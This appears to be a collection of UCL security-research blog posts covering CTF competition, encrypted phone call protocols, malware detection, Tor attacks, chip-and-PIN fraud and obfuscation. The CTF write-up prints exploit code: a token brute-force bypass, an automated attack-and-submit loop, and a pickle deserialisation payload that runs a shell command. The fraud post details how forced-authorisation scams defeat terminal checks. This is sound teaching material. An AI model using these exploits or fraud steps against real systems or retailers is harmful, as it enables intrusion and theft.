Our contributions to the UK Distributed Ledger Technology report

The UK Government Office for Science has published its report on “Distributed ledger technology: beyond block chain”, to which UCL’s Sarah Meiklejohn, Angela Sasse and I (George Danezis) contributed parts of the security and privacy material. The review looks largely at the economic, innovation and social aspects of these technologies. Our part discusses potential threats to ledgers, as well as opportunities to build robust security systems using ledgers (Certificate Transparency & CONIKS) and to overcome privacy challenges, including a mention of the z.cash technology.

You can listen to the podcast interview Sarah gave on the report’s use cases and recommendations, as well as, more broadly, future research directions for distributed ledgers, such as better privacy protection.

In terms of recommendations, I personally welcome the call for the Government Digital Service and other innovation bodies to build capacity around distributed ledger technologies. The call for more research into efficient and secure ledgers (and the specific mention of cryptography research) is also a good idea, and an obvious need. When it comes to the specific security and privacy recommendation, it simply calls for standards to be established and followed. Sadly, this is rather vague: a standards-based approach to designing secure and privacy-friendly systems has not led to major successes. Instead, openness in the design, a clear focus on key end-to-end security properties, and the involvement of a wide community of experts might be more productive (and less susceptible to subversion).

The report is well timed: our paper on “Centrally Banked Crypto-Currencies”, largely inspired by the research agenda published by the Bank of England, will be presented by Sarah Meiklejohn in February at a leading security conference, NDSS 2016. It provides some answers to the problems of scalability and eco-friendliness in current proof-of-work based ledger designs.

First UCL team competes in the International Capture The Flag competition

Team THOR, UCL’s Capture the Flag (CTF) team, took part in its first CTF competition – the UCSB iCTF – on 4th December 2015. The team comprised students from the computer science department – Tom Sigler, Chris Park, Jason Papapanagiotakis, Azeem Ilyas, Salman Khalifa, Luke Roberts, Haran Anand, Alexis Enston, Austin Chamberlain, Jaromir Latal, Enrico Mariconti, and Razvan Ragazan. Prepared by Gianluca Stringhini’s hacking seminars and our own experience, we were eager to test our ability to identify, exploit and patch application vulnerabilities.

The THOR team in action

The CTF competition style was “attack and defence” with a slight twist – each participating team had to write a vulnerable application. We were provided with a Linux virtual machine containing all of the applications, which we hosted on a locally running server. This server connected to the organiser’s network over a virtual private network (VPN). During the competition, the organiser regularly polled our server to check that each of the applications was running and whether or not it still had a security vulnerability. We were scored on three criteria: how many applications were up and running (and whether or not their vulnerabilities had been patched), how many flags we had managed to obtain by exploiting vulnerabilities, and how close our submitted application was to the median in terms of being vulnerable, but not too vulnerable.

The application had to be “balanced” in terms of security, i.e., if it was too easy or too difficult to exploit, points would be deducted. Fortunately, the organisers provided sample applications which gave us an excellent starting point. One of the sample applications was a “notes” service written in PHP – it enabled a note (which represented the flag) to be saved against a flag ID with a password. The note could be retrieved by supplying the flag ID and password, but a vulnerable CGI script enabled the note to be retrieved without a password! We customised this application by removing the CGI script (this vulnerability was very easy to identify and exploit) and changing the note insertion code so that a specially crafted token (a hex-encoded Epoch timestamp) was added next to each flag ID, password and note entry. A vulnerability was then introduced whereby note retrieval would be a two-step process – first the flag ID and password would be specified, then, if the password was valid, the token would be retrieved and used in combination with the flag ID to retrieve the note. The first step of the process could be bypassed by brute-forcing the token and avoiding the password verification phase. We kept our fingers crossed that this would be exploitable by the other teams, but not too easily!
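For illustration, here is a minimal sketch of the kind of exploit we hoped other teams would write against our service. The endpoint, parameter names and server address are hypothetical stand-ins, and it assumes the token is a hex-encoded Epoch timestamp from roughly the last hour:

```python
import time
import requests  # third-party: pip install requests

BASE = "http://203.0.113.10:8080"  # hypothetical address of a team's server

def steal_note(flag_id):
    """Bypass the password check by brute-forcing the token: a
    hex-encoded Epoch timestamp close to the note's creation time."""
    now = int(time.time())
    for ts in range(now, now - 3600, -1):  # search the last hour, newest first
        token = format(ts, "x")            # hex-encode the candidate timestamp
        r = requests.get(BASE + "/get_note.php",
                         params={"flag_id": flag_id, "token": token})
        if r.ok and r.text.strip():        # non-empty reply = the note (flag)
            return r.text.strip()
    return None
```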

Attacking involved analysing the various applications written by the other teams for vulnerabilities. As soon as a vulnerability had been identified, we had to write some code to perform the exploit and retrieve the flag for that application. The flag served as evidence that we had successfully exploited an application. To maximise attack points, we had to run the exploit against each team’s server and submit the flags to the organiser every few minutes. Defence involved ensuring that the applications were up and running, keeping the server online and ideally patching any vulnerabilities identified in our copies of the applications.
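In practice that boils down to a scheduler along these lines – a hedged sketch in which the team addresses, submission endpoint and per-service exploit are all placeholders:

```python
import time
import requests  # third-party: pip install requests

TEAM_SERVERS = ["10.7.%d.2" % n for n in range(1, 36)]  # placeholder IPs
SUBMIT_URL = "http://organiser.example/flags"           # placeholder endpoint

def exploit_notes_service(host):
    """Service-specific exploit; returns a flag string or None."""
    ...  # one of these functions per vulnerable application
    return None

while True:
    for host in TEAM_SERVERS:
        try:
            flag = exploit_notes_service(host)
            if flag:
                requests.post(SUBMIT_URL, data={"flag": flag})
        except Exception:
            pass  # a team's service being down shouldn't stop the loop
    time.sleep(120)  # flags are rotated every few minutes
```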

The competition started at 5pm – we were online with our server and applications shortly afterwards. Fueled by adrenaline, caffeine, and immense enthusiasm, we chose several applications to focus our initial efforts on and got cracking!

A good portion of the applications were web applications written in PHP. This was great news as we had focused on web application vulnerabilities during the hacking seminars. We also identified applications written in Python, Java, C and Bash. Some of them were imaginative and amusing – a dating service for monkeys written in PHP, a pizza order and delivery service written in PHP and a command-line dungeon game written in C.

We managed to exploit and patch an ATM machine application through a SQL injection vulnerability (the same class of security vulnerability involved in the recent TalkTalk and vTech data breaches). One of the Python applications used the “pickle” function, which was exploited to enable arbitrary code execution. A second Python application was vulnerable to a path-traversal bug which enabled flags to be retrieved from other users’ directories. We were also on the cusp of exploiting a buffer-overflow vulnerability in a C application, but ran out of time.
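The pickle issue is the classic one: calling `pickle.loads` on attacker-controlled data allows arbitrary code execution via `__reduce__`. A minimal sketch (the command and flag path are made up):

```python
import os
import pickle

class Exploit:
    # Unpickling calls __reduce__ and invokes whatever callable it
    # returns, so deserialising this object runs a shell command.
    def __reduce__(self):
        return (os.system, ("cat /opt/service/flag",))  # hypothetical path

payload = pickle.dumps(Exploit())
# Any service that calls pickle.loads(payload) on untrusted input
# executes the command above with the service's privileges.
```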

The competition ran for 8 hours and at the end, THOR ranked 14th out of 35. Given that it was THOR’s first time participating in a CTF, that we were the only team representing the UK, and that we were up against experienced teams, we felt it was a great result! We had a huge amount of fun taking part and working as a team – so much so that we are planning to take part in more CTF competitions in the future! Many thanks again to Gianluca, the organisers and all who participated. Go THOR!

Insecure by design: protocols for encrypted phone calls

The MIKEY-SAKKE protocol is being promoted by the UK government as a better way to secure phone calls. The reality is that MIKEY-SAKKE is designed to offer minimal security while allowing undetectable mass surveillance, through the introduction of a backdoor based around mandatory key-escrow. This weakness has implications which go further than just the security of phone calls.

The current state of security for phone calls leaves a lot to be desired. Land-line calls are almost entirely unencrypted, and cellphone calls are also unencrypted except for the radio link between the handset and the phone network. While the latest cryptography standards for cellphones (3G and 4G) are reasonably strong, it is possible to force a phone to fall back to older standards with easy-to-break cryptography, if any. The vast majority of phones will not reveal to their user whether such an attack is under way.

The only reason that eavesdropping on land-line calls is not commonplace is that getting access to the closed phone networks is not as easy as getting access to the more open Internet, and cellphone cryptography designers relied on the equipment necessary to intercept the radio link being affordable only by well-funded government intelligence agencies, not by criminals or for corporate espionage. That might have been true in the past, but it is certainly no longer the case, with the necessary equipment now available for $1,500. Governments, companies and individuals are increasingly looking for better security.

A second driver for better phone call encryption is the convergence of Internet and phone networks. The LTE (Long-Term Evolution) 4G cellphone standard – under development by the 3rd Generation Partnership Project (3GPP) – carries voice calls over IP packets, and desktop phones in companies are increasingly carrying voice over IP (VoIP) too. Because voice calls may travel over the Internet, whatever security was offered by the closed phone networks is gone and so other security mechanisms are needed.

Like Internet data encryption, voice encryption can broadly be categorised as either link encryption, where each intermediary may encrypt data before passing it onto the next, or end-to-end encryption, where communications are encrypted such that only the legitimate end-points can have access to the unencrypted communication. End-to-end encryption is preferable for security because it avoids intermediaries being able to eavesdrop on communications and gives the end-points assurance that communications will indeed be encrypted all the way to their other communication partner.

Current cellphone encryption standards are link encryption: the phone encrypts calls between it and the phone network using cryptographic keys stored on the Subscriber Identity Module (SIM). Within the phone network, encryption may also be present, but the network provider still has access to unencrypted data, so even ignoring the vulnerability to fall-back attacks on the radio link, the network providers and their suppliers are weak points that are tempting for attackers to compromise. Recent examples of such attacks include the compromise of the phone networks of Vodafone in Greece (2004) and Belgacom in Belgium (2012), and the SIM card supplier Gemalto in France (2010). The identity of the Vodafone Greece hacker remains unknown (though the NSA is suspected), but the attacks against Belgacom and Gemalto were carried out by the UK signals intelligence agency – GCHQ – and only publicly revealed through the Snowden leaks, so it is quite possible there are other attacks which remain hidden.

Email is typically only secured by link encryption, if at all, with HTTPS encrypting access to most webmail and Transport Layer Security (TLS) sometimes encrypting other communication protocols that carry email (SMTP, IMAP and POP). Again, the fact that intermediaries have access to plaintext creates a vulnerability, as demonstrated by the 2009 hack of Google’s Gmail, likely originating from China. End-to-end email encryption is possible using the OpenPGP or S/MIME protocols, but their use is not common, primarily due to their poor usability, which in turn is at least partially a result of having to stay compatible with older, insecure email standards.

In contrast, instant messaging applications had more opportunity to start with a clean slate (because there is no expectation of compatibility among different networks), and so this is where much innovation in terms of end-to-end security has taken place. Secure voice communication, however, has had less attention than instant messaging, so in the remainder of the article we shall examine what should be expected of a secure voice communication system, and in particular see how one of the latest and upcoming protocols, MIKEY-SAKKE, which comes with UK government backing, meets these criteria.

MIKEY-SAKKE and Secure Chorus

MIKEY-SAKKE is the security protocol behind the Secure Chorus voice (and also video) encryption standard, commissioned and designed by GCHQ through their information security arm, CESG. GCHQ have announced that they will only certify voice encryption products through their Commercial Product Assurance (CPA) security evaluation scheme if the product implements MIKEY-SAKKE and Secure Chorus. As a result, MIKEY-SAKKE has a monopoly over the vast majority of classified UK government voice communication, and so companies developing secure voice communication systems must implement it in order to gain access to this market. GCHQ can also set requirements for what products are used in the public sector, as well as for companies operating critical national infrastructure.

UK government standards are also influential in guiding purchase decisions outside of government, and we are already seeing MIKEY-SAKKE marketed commercially as “government-grade security”, capitalising on its approval for use in the UK government. For this reason, and also because GCHQ have provided implementers with a free open-source library to make it easier and cheaper to deploy Secure Chorus, we can expect wide use of MIKEY-SAKKE in industry and possibly among the public. It is therefore important to consider whether MIKEY-SAKKE is appropriate for wide-scale use. For the reasons outlined in the remainder of this article, the answer is no – MIKEY-SAKKE is designed to offer minimal security while allowing undetectable mass surveillance through key-escrow, not to provide effective security.

Continue reading Insecure by design: protocols for encrypted phone calls

ACE-CSR opening event 2015/16: talks on malware, location privacy and wiretap law

The opening event for the UCL Academic Centre of Excellence for Cyber Security Research in the 2015–2016 academic term featured three speakers: Earl Barr, whose work on approximating program equivalence has won several ACM distinguished paper awards; Mirco Musolesi from the Department of Geography, whose background includes a degree in computer science and an interest in analysing myriad types of data while protecting privacy; and Susan Landau, a professor at Worcester Polytechnic Institute, a visiting professor at UCL, and an expert on cyber security policy whose books include Privacy On the Line: the Politics of Wiretapping and Encryption (with Whitfield Diffie) and Surveillance or Security? The Risks Posed by New Wiretapping Technologies.

Detecting malware and IP theft through program similarity

Earl Barr is a member of the software systems engineering group and the Centre for Research on Evolution, Search, and Testing. His talk outlined his work using program similarity to determine whether two arbitrary programs have the same behaviour in two areas relevant to cyber security: malware and intellectual property theft in binaries (that is, code reused in violation of its licence).

Barr began by outlining his work on detecting malware, comparing the problem to that facing airport security personnel trying to find a terrorist among millions of passengers. The work begins with profiling: collect two zoos – one of known malware, one of benign programs – and then ask whether the program under consideration is more likely to belong to the benign zoo or the malware zoo.

Rather than study the structure of the binary, Barr works by viewing the program as strings of 0s and 1s, which may not coincide with the program’s instructions, and using information theory to create a measure of dissimilarity: the normalised compression distance (NCD). The NCD approximates the (uncomputable) distance based on Kolmogorov complexity – a mathematical measure of the length of the shortest description of an object – by substituting a practical compression algorithm, which also ignores the details of the instruction set architecture for which the binary is written.
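The NCD of two byte strings can be computed with any off-the-shelf compressor. A minimal sketch using zlib (Barr’s work uses a compressor chosen for the purpose; zlib here is just a stand-in):

```python
import zlib

def ncd(x: bytes, y: bytes) -> float:
    """Normalised compression distance: near 0 for very similar
    inputs, near 1 for unrelated ones."""
    cx = len(zlib.compress(x))
    cy = len(zlib.compress(y))
    cxy = len(zlib.compress(x + y))
    return (cxy - min(cx, cy)) / max(cx, cy)

# Classify a sample by its average distance to each zoo.
print(ncd(b"A" * 1000, b"A" * 999))             # small: very similar
print(ncd(b"A" * 1000, bytes(range(256)) * 4))  # large: dissimilar
```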

Using these techniques to analyse a malware zoo collected from sources such as Virus Watch, Barr was able to achieve a 95.7% accuracy rate. He believes that although this technique isn’t suitable for contemporary desktop anti-virus software, it opens a new front in the malware detection arms race. Still, Barr is aware that malware writers will rapidly develop countermeasures and his group is already investigating counter-countermeasures.

Malware writers have three avenues for blocking detection: injecting new content that looks benign; encryption; and obfuscation. Adding new content threatens the malware’s viability: raising the NCD by 50% requires doubling the size of the malware. Encryption can be used against the malware writer: applying a language model across the program reveals a distinctive saw-toothed pattern of regions with low surprise and low entropy alternating with regions of high surprise and high entropy (that is, regions with ciphertext). Obfuscation is still under study: the group is using three obfuscation engines available for Java and applying them repeatedly to Java malware. Measuring the NCD after each application shows that after 100 iterations the NCD approaches 1 (that is, the two items being compared are dissimilar), but that two of the three engines make errors after 200 applications. Unfortunately for malware writers, this technique also causes the program to grow in size. The cost of obfuscation to malware writers may therefore be greater than that imposed upon white hats.
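The saw-tooth pattern can be made visible with a simple sliding-window scan. The sketch below uses plain Shannon entropy rather than a trained language model, so it is a simplification of the technique described above:

```python
import math
from collections import Counter

def shannon_entropy(window: bytes) -> float:
    """Bits per byte: ~0 for constant data, approaching 8 for ciphertext."""
    n = len(window)
    return -sum(c / n * math.log2(c / n) for c in Counter(window).values())

def entropy_profile(binary: bytes, win: int = 256, step: int = 64):
    """Slide a window over the binary; sustained near-8 stretches are
    the high-entropy regions that betray an encrypted payload."""
    return [shannon_entropy(binary[i:i + win])
            for i in range(0, len(binary) - win + 1, step)]
```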

Continue reading ACE-CSR opening event 2015/16: talks on malware, location privacy and wiretap law

Nicolas Courtois – Algebraic cryptanalysis is not the best way to break something, but sometimes it is the only option

Nicolas Courtois, a mathematician and senior lecturer in computer science at UCL, working with Daniel Hulme and Theodosis Mourouzis, has won the 2012 best paper award from the International Academy, Research, and Industry Association for their work on using SAT solvers to study various problems in algebra and circuit optimization. The research was funded by the European Commission under the FP7 project number 242497, “Resilient Infrastructure and Building Security (RIBS)” and by the UK Technology Strategy Board under project 9626-58525. The paper, Multiplicative Complexity and Solving Generalized Brent Equations with SAT Solvers, was presented at Computation Tools 2012, the third International Conference on Computational Logics, Algebras, Programming, Tools, and Benchmarking, held in Nice, France in July.

https://www.youtube.com/watch?v=Lfen7ZOIkYw

SAT (short for “satisfiability”) solvers are algorithms used to analyse logical problems composed of multiple statements such as “A is true OR not-B is true OR C is true” for the purpose of determining whether the whole system can be true – that is, whether all the statements it’s composed of can be satisfied. SAT solvers are also used to determine how to assign the variables to make the set of statements true. In 2007, Bard and Courtois realised they could be used to test the security of cryptographic functions and measure their complexity, and today they are important tools in cryptanalysis; they had already long been used in other applications such as verifying hardware and software. In this particular paper, Courtois, Hulme, and Mourouzis focused on optimising S-boxes for industrial block ciphers; the paper reports the results of applying their methodology to the PRESENT and GOST block ciphers. Reducing the complexity and hardware cost of these ciphers is particularly important for building so-called secure implementations of cryptography. These are particularly costly because they need to protect against additional threats such as side-channel attacks, in which the attacker exploits additional information leaked from the physical system – for example, by using an oscilloscope to observe a smart card’s behaviour.
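To make the problem concrete, here is a toy satisfiability checker. Real SAT solvers use far cleverer search than this exhaustive loop, but exhaustion shows both sides of the coin: it can return a satisfying assignment, or establish that none exists – the “proof that something is not true” mentioned below.

```python
from itertools import product

# Conjunctive normal form: each clause lists literals, where 3 means
# "x3 is true" and -2 means "x2 is false". This formula encodes
# (x1 OR NOT x2 OR x3) AND (NOT x1 OR x2) AND (NOT x3).
cnf = [[1, -2, 3], [-1, 2], [-3]]

def brute_force_sat(cnf, n_vars):
    for bits in product([False, True], repeat=n_vars):
        assignment = {v + 1: bits[v] for v in range(n_vars)}
        if all(any(assignment[abs(lit)] == (lit > 0) for lit in clause)
               for clause in cnf):
            return assignment  # satisfiable, with a witness
    return None                # unsatisfiable: no assignment works

print(brute_force_sat(cnf, 3))  # {1: False, 2: False, 3: False}
```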

“It’s more a discovery than an invention,” says Courtois. “One of the amazing things SAT solvers can do is give you proof that something is not true.” The semiconductor industry provides one application of the work in this paper: these techniques promise to provide a way to test whether a circuit has been built with the greatest possible efficiency by proving that the chip design uses the smallest possible number of logic gates.

“You’ll get optimal designs and be able to prove they cannot be done better,” he says.

Classical cryptanalysis proceeds by finding approximations to the way a cipher works. Many successful academic attacks have been mounted using such techniques, but they rely on having a relatively large amount of data available for study. That works for large archives of stored data – such as, for example, the communications stored and kept by the Allies after World War II for later cryptanalysis. But in many real-world applications, it is more common to have only very small amounts of data.

“The more realistic scenario is that you’ll just have one or a few messages,” says Courtois. Bluetooth, for example, encrypts only 1,500 bits with a single key. “Most attacks are useless because they won’t work with this quantity of data.” Algebraic cryptanalysis – which he explained in New Frontier in Symmetric Cryptanalysis, an invited talk at Indocrypt 2008 – is, by contrast, one of the few techniques that can be hoped to work in such difficult situations.

Continue reading Nicolas Courtois – Algebraic cryptanalysis is not the best way to break something, but sometimes it is the only option

How Tor’s privacy was (momentarily) broken, and the questions it raises

Just how secure is Tor, one of the most widely used internet privacy tools? Court documents released from the Silk Road 2.0 trial suggest that a “university-based research institute” provided information that broke Tor’s privacy protections, helping identify the operator of the illicit online marketplace.

Silk Road and its successor Silk Road 2.0 were run as a Tor hidden service, an anonymised website accessible only over the Tor network which protects the identity of those running the site and those using it. The same technology is used to protect the privacy of visitors to other websites including journalists reporting on mafia activity, search engines and social networks, so the security of Tor is of critical importance to many.

How Tor’s privacy shield works

Almost 97% of Tor traffic is from those using Tor to anonymise their use of standard websites outside the network. To do so, a path is created through the Tor network via three computers (nodes) selected at random: a first node entering the network, a middle node (or nodes), and a final node from which the communication exits the Tor network and passes to the destination website. The first node knows the user’s address, the last node knows the site being accessed, but no node knows both.

The remaining 3% of Tor traffic is to hidden services. These websites use “.onion” addresses stored in a hidden service directory. The user first requests information on how to contact the hidden service website, then both the user and the website make the three-hop path through the Tor network to a rendezvous point which joins the two connections and allows both parties to communicate.

In both cases, if a malicious operator simultaneously controls both the first and last nodes of a path through the Tor network, then it is possible to link the incoming and outgoing traffic and potentially identify the user. To prevent this, the Tor network is designed from the outset to have sufficient diversity in terms of who runs nodes and where they are located – and the way that nodes are selected will avoid choosing closely related nodes, so as to reduce the likelihood of a user’s privacy being compromised.
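As a toy illustration of that diversity constraint, consider selecting a path while rejecting candidates that share an IPv4 /16 prefix – one heuristic Tor actually uses (real Tor additionally weights choices by bandwidth and honours declared relay “families”; the relay list here is made up):

```python
import random

# Hypothetical relay list: (nickname, IPv4 address) pairs.
RELAYS = [("guardA", "203.0.113.5"), ("middleB", "198.51.100.7"),
          ("exitC", "203.0.113.9"), ("exitD", "192.0.2.44"),
          ("middleE", "198.51.7.7")]

def same_slash16(ip1: str, ip2: str) -> bool:
    """Crude proxy for 'closely related': same first two IPv4 octets."""
    return ip1.split(".")[:2] == ip2.split(".")[:2]

def pick_path(relays, hops=3):
    """Sample candidate paths until no two hops look related."""
    while True:
        path = random.sample(relays, hops)
        ips = [ip for _, ip in path]
        if not any(same_slash16(a, b)
                   for i, a in enumerate(ips) for b in ips[i + 1:]):
            return path

print(pick_path(RELAYS))
```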

How Tor works (source: EFF)

This type of design is known as distributed trust: compromising any single computer should not be enough to break the security the system offers (although compromising a large proportion of the network is still a problem). Distributed trust systems protect not only the users, but also the operators; because the operators cannot break the users’ anonymity – they do not have the “keys” themselves – they are less likely to be targeted by attackers.

Unpeeling the onion skin

With about 2m daily users, Tor is by far the most widely used privacy system and is considered one of the most secure, so research that demonstrates the existence of a vulnerability is important. Most research examines how to increase the likelihood of an attacker controlling both the first and last nodes in a connection, or how to link incoming traffic to outgoing traffic.

When the 2014 programme for the annual BlackHat conference was announced, it included a talk by a team of researchers from CERT, a Carnegie Mellon University research institute, claiming to have found a means to compromise Tor. But the talk was cancelled and, unusually, the researchers did not give advance notice of the vulnerability to the Tor Project in order for them to examine and fix it where necessary.

This decision was particularly strange given that CERT is the worldwide coordinator for ensuring software vendors are notified of vulnerabilities in their products so they can fix them before criminals can exploit them. However, the CERT researchers gave enough hints that Tor developers were able to investigate what had happened. When they examined the network, they found someone was indeed attacking Tor users using a technique that matched CERT’s description.

The multiple node attack

The attack turned on a means to tamper with a user’s traffic as they looked up the .onion address in the hidden service directory, or in the hidden service’s traffic as it uploaded the information to the directory.

Continue reading How Tor’s privacy was (momentarily) broken, and the questions it raises

New EU Innovative Training Network project “Privacy & Us”

Last week, “Privacy & Us” — an Innovative Training Network (ITN) project funded by the EU’s Marie Skłodowska-Curie actions — held its kick-off meeting in Munich. Hosted in the nice and modern Wissenschaftszentrum campus by Uniscon, one of the project partners, principal investigators from seven different countries set out the plan for the next 48 months.

Privacy & Us really stands for “Privacy and Usability”. The project aims to conduct privacy research and, over the next three years, train thirteen Early Stage Researchers (ESRs) — i.e., PhD students — to reason about, design, and develop innovative solutions to privacy research challenges, not only from a technical point of view but also from the “human side”.

The project involves nine “beneficiaries”: Karlstads Universitet (Sweden), Goethe-Universität Frankfurt (Germany), Tel Aviv University (Israel), Unabhängiges Landeszentrum für Datenschutz (Germany), Uniscon (Germany), University College London (UK), USECON (Austria), VASCO Innovation Center (UK), and Wirtschaftsuniversität Wien (Austria), as well as seven partner organizations: the Austrian Data Protection Authority (Austria), Preslmayr Rechtsanwälte OG (Austria), Friedrich-Alexander University Erlangen (Germany), University of Bonn (Germany), the Bavarian Data Protection Authority (Germany), EveryWare Technologies (Italy), and Sentor MSS AB (Sweden).

The people behind the Privacy & Us project at the kick-off meeting in Munich, December 2015

The Innovative Training Networks are interdisciplinary and multidisciplinary in nature and promote, by design, a collaborative approach to research training. Funding is extremely competitive, with an acceptance rate as low as 6%, and quite generous for the ESRs, who often enjoy higher-than-usual salaries (exact numbers depend on the hosting country), plus a 600 EUR/month mobility allowance and a 500 EUR/month family allowance.

The students will start in August 2016 and will be trained to face both current and future challenges in the area of privacy and usability, spending a minimum of six months in secondment to another partner organization, and participating in several training and development activities.

Three studentships will be hosted at UCL, under the supervision of Dr Emiliano De Cristofaro, Prof. Angela Sasse, Prof. Ann Blandford, and Dr Steven Murdoch. Specifically, one project will investigate how to securely and efficiently store genomic data, designing and implementing privacy-preserving genomic testing, as well as supporting user-centred design of secure personal genomic applications. The second project will aim to better understand and support individuals’ decision-making around healthcare data disclosure, weighing up the personal and societal costs and benefits of disclosure. The third (with the VASCO Innovation Centre) will explore techniques for privacy-preserving authentication, extending these to develop and evaluate innovative solutions for secure and usable authentication that respect user privacy.

Continue reading New EU Innovative Training Network project “Privacy & Us”

Forced authorisation chip and PIN scam hitting high-end retailers

Chip and PIN was designed to prevent fraud, but it also created a new opportunity for criminals that is taking retailers by surprise. Known as “forced authorisation”, committing the fraud requires no special equipment, and when it works, it works big: in one transaction a jewellery store lost £20,500. This type of fraud is already a problem in the UK, and now that US retailers have made it through the first Black Friday since the Chip and PIN deadline, criminals there will be looking into what new fraud techniques are available.

The fraud works when the retailer has a one-piece Chip and PIN terminal that’s passed between the customer and retailer during the course of the transaction. This type of terminal is common, particularly in smaller shops and restaurants. They’re a cheaper option compared to terminals with a separate PIN pad (at least until a fraud happens).

The way forced authorisation fraud works is that the retailer sets up the terminal for a transaction by inserting the customer’s card and entering the amount, then hands the terminal over to the customer so they can type in the PIN. But the criminal has used a stolen or counterfeit card, and due to the high value of the transaction the terminal performs a “referral” — asking the retailer to call the bank to perform additional checks such as the customer answering a security question. If the security checks pass, the bank will give the retailer an authorisation code to enter into the terminal.

The problem is that when the terminal asks for these security checks, it’s still in the hands of the criminal, and it’s the criminal who follows the steps that the retailer should have followed. Since there’s no phone conversation with the bank, the criminal doesn’t know the correct authorisation code. But what surprises retailers is that the criminal can type in anything at this stage and the transaction will go through. The criminal might also be able to bypass other security features; for example, they could override the checking of the PIN by following the steps the retailer would take if the customer had forgotten the PIN.
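To see why this works, consider a crude model of the terminal’s referral logic – purely illustrative pseudologic, not any vendor’s actual firmware, with an assumed code format. During a referral the terminal is offline, so all it can do is check that whatever is typed in looks like an authorisation code:

```python
def referral_step(entered_code: str) -> str:
    """Toy model of a one-piece terminal handling a referral.

    There is no online connection at this point, so the terminal can
    only check the code's format, not whether the bank really issued it.
    """
    if len(entered_code) == 6 and entered_code.isalnum():  # assumed format
        return "APPROVED"  # printed on the receipt straight away
    return "DECLINED"

# The criminal types any well-formed code:
print(referral_step("123456"))  # APPROVED
# Nothing here contacts the bank; the code is only verified later.
```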

By the time the terminal is passed back to the retailer, it looks like the transaction was completed successfully. The receipt will differ only very subtly from that of a normal transaction, if at all. The criminal walks off with the goods and it’s only at the end of the day that the authorisation code is checked by the bank. By that time, the criminal is long gone. Because some of the security checks the bank asked for weren’t completed, the retailer doesn’t get the money.

Continue reading Forced authorisation chip and PIN scam hitting high-end retailers

Program obfuscation

I had the pleasure of visiting the Simons Institute for the Theory of Computing at UC Berkeley over the summer. One of the main themes of the programme was obfuscation.

Recently there has been a lot of exciting research on developing cryptographic techniques for program obfuscation. Obfuscation is of course not a new thing – you may already be familiar with the obfuscated C contest – but the hope underlying this research effort is to replace ad hoc obfuscation, which may or may not be possible to reverse engineer, with general techniques that can be applied to obfuscate any program and that satisfy a rigorous definition of what it means for a program to be obfuscated.

Even defining what it means for a program to be obfuscated is not trivial. Ideally, we would like an obfuscator to be a compiler that turns any computer program into a virtual black-box. By a virtual black-box we mean that the obfuscated program should preserve functionality while not leaking any other information about the original code, i.e., it should have the same input-output behaviour as the original program and you should not be able to learn anything beyond what you could learn by executing the original program. Unfortunately, it turns out that this is too ambitious a goal: there are special programs which are impossible to virtual black-box obfuscate.

Instead, cryptographers have been working towards developing something called indistinguishability obfuscation. Here the goal is that, given two functionally equivalent programs P1 and P2 of the same size and an obfuscation of one of them, O(Pi), it should not be possible to tell which one has been obfuscated. Interestingly, even though this is a weaker notion than virtual black-box obfuscation, it has already found many applications in the construction of cryptographic schemes. Furthermore, it has been proved that indistinguishability obfuscation is the best possible obfuscation in the sense that any information leaked by an obfuscated program is also leaked by any other program computing the same functionality.
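To make “functionally equivalent” concrete: the two toy programs below compute the same function in visibly different ways. An indistinguishability obfuscator would guarantee that, given an obfuscation of one of them, you cannot tell which one it came from. (This only illustrates the definition; it is not an obfuscator.)

```python
def p1(x: int) -> int:
    return x * x

def p2(x: int) -> int:
    # Same input-output behaviour as p1, but structured differently:
    # x**2 computed as abs(x) added to itself abs(x) times.
    total = 0
    for _ in range(abs(x)):
        total += abs(x)
    return total

# Functional equivalence on a sample of inputs; an indistinguishability
# obfuscator O would make O(p1) and O(p2) indistinguishable.
assert all(p1(x) == p2(x) for x in range(-100, 101))
```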

So, when will you see obfuscation algorithms that you can use to obfuscate your code? Well, current obfuscation algorithms have horrible efficiency and are far from practical applicability, so there is still a lot of research to be done on improving them. Moreover, current obfuscation proposals are based on something called graded encoding schemes. At the moment, there is a tug of war going on between cryptographers proposing graded encoding schemes and cryptanalysts breaking them. Breaking graded encoding schemes does not necessarily break the obfuscation algorithms built on them, but it is fair to say that right now the situation is a mess – which, from a researcher’s perspective, makes the field very exciting, since there is still a lot to discover!

If you want to learn more about obfuscation, I recommend watching some of the excellent talks from the programme.

Scaling Tor hidden services

Tor hidden services offer several security advantages over normal websites:

  • both the client requesting the webpage and the server returning it can be anonymous;
  • websites’ domain names (.onion addresses) are linked to their public keys, so they are hard to impersonate; and
  • there is mandatory encryption from the client to the server.

However, Tor hidden services as originally implemented did not take full advantage of parallel processing, whether from a single multi-core computer or from load-balancing over multiple computers. Therefore, once a single hidden service has hit the limit of vertical scaling (getting faster CPUs), there is no option of horizontal scaling (adding more CPUs and more computers). There are also bottlenecks in the Tor network, such as the 3–10 introduction points that help to negotiate the connection between the hidden service and the rendezvous point that actually carries the traffic.

For my MSc Information Security project at UCL, supervised by Steven Murdoch with the assistance of Alec Muffett and other Security Infrastructure engineers at Facebook in London, I explored possible techniques for improving the horizontal scalability of Tor hidden services. More precisely, I was looking at possible load balancing techniques to offer better performance and resiliency against hardware/network failures. The focus of the research was aimed at popular non-anonymous hidden services, where the anonymity of the service provider was not required; an example of this could be Facebook’s .onion address.

One approach I explored was to simply run multiple hidden service instances using the same private key (and hence the same .onion address). Each hidden service periodically uploads its own descriptor, which describes the available introduction points, to six hidden service directories on a distributed hash table. The hidden service instance chosen by the client depends on which hidden service instance most recently uploaded its descriptor. In theory this approach allows an arbitrary number of hidden service instances, where each periodically uploads its own descriptors, overwriting those of others.

This approach can work for popular hidden services because, with the large number of clients, some will be using the descriptor most recently uploaded, while others will have cached older versions and continue to use them. However my experiments showed that the distribution of the clients over the hidden service instances set up in this way is highly non-uniform.
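A toy simulation suggests why: if each instance re-uploads at its own point in the cycle and every client simply follows the most recent descriptor, each instance receives traffic in proportion to the gap between uploads, which is rarely even. (This sketch ignores client-side caching and the replication across the six directories; the upload period is an assumption.)

```python
import random

INSTANCES = 3       # hidden service instances sharing one .onion key
CLIENTS = 10000
PERIOD = 3600.0     # assumed descriptor re-upload period, in seconds

# Each instance uploads once per period, at a random offset.
offsets = sorted(random.uniform(0, PERIOD) for _ in range(INSTANCES))

hits = [0] * INSTANCES
for _ in range(CLIENTS):
    t = random.uniform(0, PERIOD)
    # The client sees the most recent upload at or before time t; before
    # the first upload of the cycle, that is last period's final one.
    current = max((i for i, off in enumerate(offsets) if off <= t),
                  default=INSTANCES - 1)
    hits[current] += 1

print(hits)  # e.g. [6873, 1950, 1177] -- far from uniform
```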

